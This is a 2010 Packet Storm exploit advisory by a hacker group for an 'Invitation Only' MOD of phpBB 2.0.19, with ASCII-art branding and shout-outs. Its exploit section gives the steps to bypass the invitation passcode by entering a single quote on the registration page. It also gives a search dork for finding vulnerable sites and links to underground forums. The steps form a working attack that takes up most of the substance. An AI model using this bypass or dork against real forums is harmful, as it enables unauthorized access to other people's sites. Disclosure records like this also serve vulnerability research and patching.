PHPBB MOD 2.0.19 SQL Injection

2010-07-23T00:00:00
ID PACKETSTORM:92092
Type packetstorm
Reporter Silic0n
Modified 2010-07-23T00:00:00

Description

                                        
                                            `% PHPBB MOD [2.0.19] Invitation Only (PassCode Bypass vulnerability)  
  
-------------------------------------------------------------------------------  
0 | | | | | | TM  
1 _______ _ __ ___ ______| |__ __ _ ___| | _____ _ __ _ __ ___| |_   
0 |_ / _ \| '_ \ / _ \______| '_ \ / _` |/ __| |/ / _ \ '__| '_ \ / _ \ __|  
1 / / (_) | | | | __/ | | | | (_| | (__| < __/ | _| | | | __/ |_   
0 /___\___/|_| |_|\___| |_| |_|\__,_|\___|_|\_\___|_|(_)_| |_|\___|\__|  
1 0xPrivate 0xSecurity 0xTeam   
0 ++++++++++++++++++++++++++++++++++++++++++++++++++++  
1 A Placec Of 0days   
------------------------------------------------------------------------------  
  
^Exploit Title : PHPBB MOD [2.0.19] Invitation Only (PassCode Bypass vulnerability)  
^Date : 23/7/2010  
^Vendor Site : www.phpbb.com  
^MOD Version : 1.0.9  
^Author : Silic0n (science_media017[At]yahoo.com)  
^Dork : inurl:profile.php?mode= register If you have an invitation passcode  
  
------------------------------------------------------------------------------  
Special Thnanks To Jackh4x0r , Gaurav_raj420 , Mr 52 (7) , Dalsim , Zetra , haZl0oh , root4o ,  
Dark , XG3N , Belma(sweety) ,Danzel, messsy , Thor ,abronsius ,Nova ,  
Console Fx , Exi , Beenu , R4cal , jaya ,entr0py,[]0iZy5 & All my friends .   
  
My Frnd Site : www.igniteds.net , www.anti-intruders.org (Will Be Up Very Soon) , www.root-market.com ,www.Darkode.com ,r00tDefaced.com  
  
----------------------------------->Exploit<----------------------------------  
  
0x1: Goto http://{localhost}/{phpBB path}/profile.php?mode=register  
0x2: Enter Passcode Or Invitation code char ' (quote) AND click Submit  
  
Now U will See the Registration Form .   
------------------------------------------------------------------------------  
  
  
  
  
  
  
  
  
  
`